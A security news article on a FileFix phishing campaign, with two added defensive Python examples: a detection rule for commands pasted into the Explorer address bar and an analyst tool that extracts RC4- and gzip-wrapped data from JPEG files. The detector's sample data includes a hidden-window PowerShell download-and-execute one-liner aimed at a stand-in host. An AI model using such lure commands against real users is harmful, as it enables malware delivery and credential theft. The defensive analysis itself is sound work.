Researchers from Acronis' Threat Research Unit (TRU) have uncovered a rare in-the-wild FileFix campaign, marking the first time the attack has been observed outside proof-of-concept demonstrations. Building on the wave of ClickFix attacks, which surged by over 500% in recent months, FileFix represents an evolutionary leap in attacker tradecraft.
According to TRU, "This represents one of the most sophisticated Fix attack instances our team has observed to date."
ClickFix-style attacks exploit social engineering to trick victims into pasting malicious commands into their terminals or Run dialogs, often disguised as CAPTCHA checks. FileFix introduces a twist: instead of targeting the terminal, it abuses the file upload dialog.

The report explains, "A FileFix attack... will leverage the file upload functionality in HTML to create an upload button... In a FileFix attack, the user is tricked into pasting a malicious command into the File Explorer address bar, which will then run the command locally on the user's machine."
This subtle shift makes the attack more convincing: many users rarely interact with a terminal, but almost everyone has used a file upload window. The command still runs in the user's own security context, exactly as it would from a Run dialog, but the prompt that delivers it looks like an ordinary file picker.
The campaign's phishing infrastructure stood out for its detail and reach. TRU noted: "The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection."
The phishing pages featured translations into 16 languages, maximizing global reach, and were backed by minified, obfuscated JavaScript that collapsed over 18,000 lines of code into just 12 to frustrate analysts.
One of the most striking aspects of the FileFix campaign is its use of steganography. TRU writes, "The attack uniquely employs steganography by embedding both a second-stage PowerShell script and encrypted, executable payloads within seemingly harmless JPG images."
Victims are tricked into pasting what looks like a file path, but the pasted string is a command that downloads an image hosted on a trusted platform such as Bitbucket. The JPG isn't just a picture: it carries both scripts and executables, which are extracted and executed silently.
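The one reliable artifact of the technique described above is that a command entered in the Explorer address bar runs with explorer.exe as its parent process. The following detection sketch is an added example written for this article, not Acronis TRU code. It assumes process-creation telemetry with three fields (image, parent image, command line); the field names, the heuristics for a padded lure, and the sample records are all constructed here.

```python
"""Flag script hosts launched via the File Explorer address bar.

Added example for this article; it is not code from Acronis TRU. It assumes
process-creation telemetry with three fields (image, parent_image,
command_line); the field names and the sample records are constructed here.
"""
import re

# Interpreters a pasted one-liner would typically start.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Fetch-and-execute indicators inside the command line.
FETCH_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Invoke-Expression|\biex\b|\bcurl\b|bitsadmin", re.I)
# A trailing comment that ends in a Windows path: what the victim sees in the
# address bar once the real command has scrolled out of view. This is an
# assumption about how the lure is padded; the article does not spell it out.
PADDED_PATH_RE = re.compile(r"#.*[A-Za-z]:\\\S+")
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (suspicious, reasons) for one process-creation record.

    explorer.exe spawning a script host is normal on its own (Start menu,
    Run box), so the verdict needs that parent plus at least one content
    indicator from the command line.
    """
    reasons = []
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return False, reasons
    from_explorer = basename(event["parent_image"]) == "explorer.exe"
    if from_explorer:
        reasons.append("script host spawned by explorer.exe")
    cmd = event["command_line"]
    content = []
    if FETCH_RE.search(cmd):
        content.append("remote fetch / inline execution in command line")
    if PADDED_PATH_RE.search(cmd):
        content.append("command padded with a comment ending in a file path")
    if HIDDEN_RE.search(cmd):
        content.append("hidden window requested")
    reasons.extend(content)
    return from_explorer and bool(content), reasons


# Constructed sample records (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    {   # victim pasted a padded one-liner into the Explorer address bar
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": 'powershell.exe -w hidden -c "iex (iwr https://example.invalid/a)" '
                        r"# C:\Users\Public\Pictures\IMG_1042.jpg",
    },
    {   # user opened PowerShell from the Start menu: explorer parent, no indicators
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe",
    },
    {   # developer downloading a tool from a terminal inside an IDE
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "command_line": 'powershell.exe -c "iwr https://example.invalid/tool.zip -OutFile tool.zip"',
    },
]


def scan(events):
    """Return the records judged suspicious, each paired with its reasons."""
    return [(e, r) for e in events for s, r in [classify(e)] if s]


if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(event["command_line"])
        for reason in reasons:
            print("   -", reason)
```

The parent-process check alone would page on every PowerShell window opened from the Start menu, so the rule only fires when the explorer.exe parent coincides with a content indicator; tune the indicator list against your own baseline before deploying it.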
The infection chain relies on layered obfuscation:
- First-stage PowerShell script: fragmented, Base64-encoded, with fake variables masking its true purpose.
- Second-stage script: extracted from the JPG, using RC4 decryption and gzip decompression to retrieve malicious DLLs or EXEs.
- Final payload: a Go-based loader with sandbox checks and string encryption, which executes the StealC infostealer.
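To make the second stage of that chain concrete, here is an added example, written for this article rather than taken from Acronis TRU, of how an analyst could pull a hidden blob out of a downloaded image and unwrap it with the RC4-then-gzip sequence the report describes. The report does not say where in the JPG the data lives; this example assumes the simplest layout, bytes appended after the end-of-image marker, and the RC4 key, the placeholder script and the sample image bytes are all made up here.

```python
"""Extract a payload appended after the JPEG end-of-image marker.

Added example for this article; not Acronis TRU tooling. The report says the
second stage is hidden in a JPG and recovered with RC4 decryption followed by
gzip decompression, but not where in the file the bytes sit. This example
assumes data appended after the EOI marker; the RC4 key and the placeholder
script are both made up here.
"""
import gzip
import struct

SOI = b"\xff\xd8"
MARKER_EOI, MARKER_SOS = 0xD9, 0xDA


def jpeg_image_end(data):
    """Offset just past the primary image's EOI marker.

    Walks marker segments instead of searching for a FFD9 byte pair, so an
    EXIF thumbnail (a complete JPEG inside an APP1 segment) is not mistaken
    for the real end of image.
    """
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte before a marker
            pos += 1
            continue
        if marker == MARKER_EOI:
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length
            pos += 2
            continue
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len
        if marker == MARKER_SOS:
            # Entropy-coded data follows; FF bytes inside it are either
            # stuffed (FF00) or restart markers (FFD0-FFD7). Anything else is
            # the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unpack_payload(image, key):
    """Return the decoded payload hidden after the image, or None if absent."""
    trailing = image[jpeg_image_end(image):]
    if not trailing:
        return None
    blob = rc4(key, trailing)
    if blob[:2] != b"\x1f\x8b":
        raise ValueError("decrypted data lacks the gzip magic; wrong key?")
    return gzip.decompress(blob)


# --- constructed sample data -------------------------------------------------
def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg():
    """Minimal JPEG-shaped bytes (not a viewable picture) with the traps a naive
    FFD9 search trips over: an APP1 'thumbnail' that has its own EOI, plus
    stuffed FF00 and an RST0 marker inside the scan data."""
    app1 = _segment(0xE1, b"Exif\x00\x00" + SOI + b"\xff\xd9")
    sos = _segment(MARKER_SOS, b"\x01\x01\x00\x00\x3f\x00")
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"
    return SOI + app1 + sos + scan + b"\xff\xd9"


KEY = b"example-key"                                 # made up; not the campaign's key
STAGE2 = b"Write-Host 'second-stage placeholder'\n"  # stand-in for the hidden script


def build_sample_image_with_payload():
    """Clean image + RC4(gzip(script)), the layout this example assumes."""
    return build_sample_jpeg() + rc4(KEY, gzip.compress(STAGE2))


if __name__ == "__main__":
    img = build_sample_image_with_payload()
    print("image ends at", jpeg_image_end(img), "of", len(img), "bytes")
    print(unpack_payload(img, KEY).decode())
```

The same end-of-image offset is also the cheapest triage check: any bytes past the primary image's EOI in a file fetched by a PowerShell one-liner deserve a look regardless of how they are encoded, and the marker walk avoids the false positive that an EXIF thumbnail's own EOI would cause for a plain byte search.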
StealC is capable of harvesting browser credentials, cryptocurrency wallets, messaging app data, and cloud access keys, while also functioning as a loader for additional malware.
The TRU team observed multiple variants of the attack evolving within just two weeks. Early versions used simple PowerShell payloads, while later iterations introduced multi-stage scripts, XOR-encrypted URLs, and AI-generated images.
"A growing rate of detections related to the campaign indicates the attack may be accelerating," the report warns.
VirusTotal submissions linked to the campaign span countries including the U.S., Bangladesh, Philippines, Tunisia, Nepal, Dominican Republic, Germany, and China, underscoring its global ambitions.
FileFix demonstrates how attackers are rapidly weaponizing proof-of-concept techniques into real-world campaigns, pushing beyond ClickFix to create more persuasive, harder-to-detect attacks. With steganography, multilingual phishing, and multi-stage payload delivery, this campaign sets a new bar for *Fix-style social engineering threats.